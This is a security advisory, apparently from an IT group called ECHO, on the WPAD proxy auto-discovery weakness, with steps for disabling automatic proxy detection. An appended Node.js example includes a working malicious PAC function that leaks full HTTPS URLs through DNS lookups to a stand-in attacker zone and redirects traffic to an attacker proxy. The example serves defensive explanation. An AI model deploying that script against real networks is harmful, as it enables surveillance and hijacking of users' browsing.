Breach by Proxy: Disable WPAD Immediately

This just in from the DEF CON security conference in Las Vegas on August 7: security researchers Paul Stone and Alex Chapman revealed that a default setting in Windows, and one that is present in many web browsers across operating systems, allows a compromised network to re-route your browser traffic through a malicious proxy. An attacker on that network can then see every URL your browser requests, including the full address and query parameters of HTTPS pages, and can read or alter any traffic that is not encrypted. A secured (HTTPS) connection does not protect you from this, because the proxy decision is made before the connection is established and the attacker sees the URL even though the page contents stay encrypted.

Disabling automatic detection of proxy settings in your operating system and browser is for the moment the only way to ensure that a compromised network can't cause you significant harm. Most users don't rely on a web proxy for access to the internet or their corporate network anyway, so leaving automatic detection of web proxy settings enabled is far riskier than turning it off. On Windows the setting is the "Automatically detect settings" checkbox under Internet Options > Connections > LAN settings (also under Settings > Network & Internet > Proxy on Windows 10); Internet Explorer, Edge and Chrome follow this system setting, while Firefox has its own proxy configuration in its network settings. ECHO is recommending you turn off this setting now or reach out to your IT department for guidance.

The culprit is the Web Proxy Auto-Discovery (WPAD) protocol. A machine with auto-detection enabled asks the network it is on where the proxy is: via a DHCP option, via a DNS lookup for a host named wpad in its domain, and, on Windows, via link-layer name resolution (LLMNR and NetBIOS) that any device on the local segment can answer. It then downloads a proxy auto-configuration (PAC) script from whoever answered. The PAC script is JavaScript whose FindProxyForURL function the browser calls for every request, HTTP or HTTPS alike, to decide whether that URL goes direct or through a proxy; the script receives the full URL and can make DNS lookups of its own, which is how a malicious script both observes and redirects traffic. Anyone who can answer those discovery requests on a network you join, for example on public Wi-Fi, therefore controls your browser's proxy settings. It is possible to disable this protocol on managed workstations, and ECHO is recommending this be done unless a proxy is actually needed, in which case it should be configured explicitly (by Group Policy or a fixed proxy address) rather than discovered automatically.
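To make concrete what a PAC script delivered over WPAD can do, here is an added example (not code from this advisory or from the researchers' talk) that runs two PAC scripts the way a browser's proxy resolver would: a normal corporate script and a malicious one. The browser-provided helpers dnsResolve() and shExpMatch() are mocked so it runs offline in Node.js; the mock dnsResolve() records every lookup, which is exactly what an attacker running the nameserver for the queried zone would see. All hostnames, addresses and URLs (corp.example, leak.attacker.example, 198.51.100.7 and so on) are constructed for the example.

```javascript
// Added example: a harness that runs proxy auto-configuration (PAC) scripts
// the way a browser does, to show what a WPAD-delivered script can see and do.
// Not from the original advisory. All names and addresses are constructed.

// Browsers expose helper functions to PAC scripts. These mocks stand in for
// them. dnsResolve() logs each lookup: an attacker who runs the authoritative
// nameserver for the queried zone observes the same names.
const dnsLog = [];
function dnsResolve(host) {
  dnsLog.push(host);
  return "203.0.113.5"; // constructed answer; the value does not matter here
}
function shExpMatch(str, pattern) {
  // Shell-style glob: '*' matches anything, '?' matches one character.
  const re = new RegExp(
    "^" +
      pattern
        .replace(/[.+^${}()|[\]\\]/g, "\\$&")
        .replace(/\*/g, ".*")
        .replace(/\?/g, ".") +
      "$"
  );
  return re.test(str);
}

// A typical corporate PAC script: intranet hosts go direct, everything else
// goes through the company proxy. It never looks at the path or query.
function benignFindProxyForURL(url, host) {
  if (shExpMatch(host, "*.corp.example")) return "DIRECT";
  return "PROXY proxy.corp.example:8080";
}

// Hex-encode a string into DNS labels of at most 63 characters each.
function toDnsLabels(s) {
  return Buffer.from(s, "utf8").toString("hex").match(/.{1,63}/g).join(".");
}

// A malicious PAC script served by a rogue WPAD responder. FindProxyForURL is
// called with the full URL (scheme, host, path, query) for HTTP and HTTPS
// requests alike, so the script leaks that URL through a DNS lookup and then
// steers the request through the attacker's proxy. (URLs whose encoded form
// would exceed the 253-character DNS name limit would have to be split across
// several lookups; that is omitted here.)
function maliciousFindProxyForURL(url, host) {
  dnsResolve(toDnsLabels(url) + ".leak.attacker.example"); // hypothetical zone
  return "PROXY 198.51.100.7:3128"; // constructed attacker proxy
}

// Drive a PAC function the way the browser's proxy resolver would.
function resolveProxy(findProxyForURL, url) {
  return findProxyForURL(url, new URL(url).hostname);
}

// What the attacker's nameserver reconstructs from the logged queries.
function leakedUrls() {
  const suffix = ".leak.attacker.example";
  return dnsLog
    .filter((name) => name.endsWith(suffix))
    .map((name) => name.slice(0, -suffix.length).split(".").join(""))
    .map((hex) => Buffer.from(hex, "hex").toString("utf8"));
}

function demo() {
  // Constructed HTTPS URL: the page body would be encrypted on the wire,
  // but the PAC script still receives the whole URL.
  const url = "https://bank.example/transfer?to=acct-42&amount=1000";
  const benign = resolveProxy(benignFindProxyForURL, url);
  const malicious = resolveProxy(maliciousFindProxyForURL, url);
  return { benign, malicious, leaked: leakedUrls() };
}

console.log(demo());
```

The benign script returns "PROXY proxy.corp.example:8080" and makes no lookups; the malicious one returns the attacker's proxy and leaves a DNS query in the log from which leakedUrls() recovers the complete HTTPS URL, query string included. That is the leak the advisory describes: nothing about the TLS connection is broken, the browser simply tells the script where it is about to go. Firefox and Chrome have since stopped passing the path and query of HTTPS URLs to PAC scripts, which narrows this particular leak to the hostname, but the proxy redirection itself still works for any client that accepts a WPAD-supplied script, which is why disabling auto-detection remains the recommendation.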

As always, ECHO is here to help if you have questions.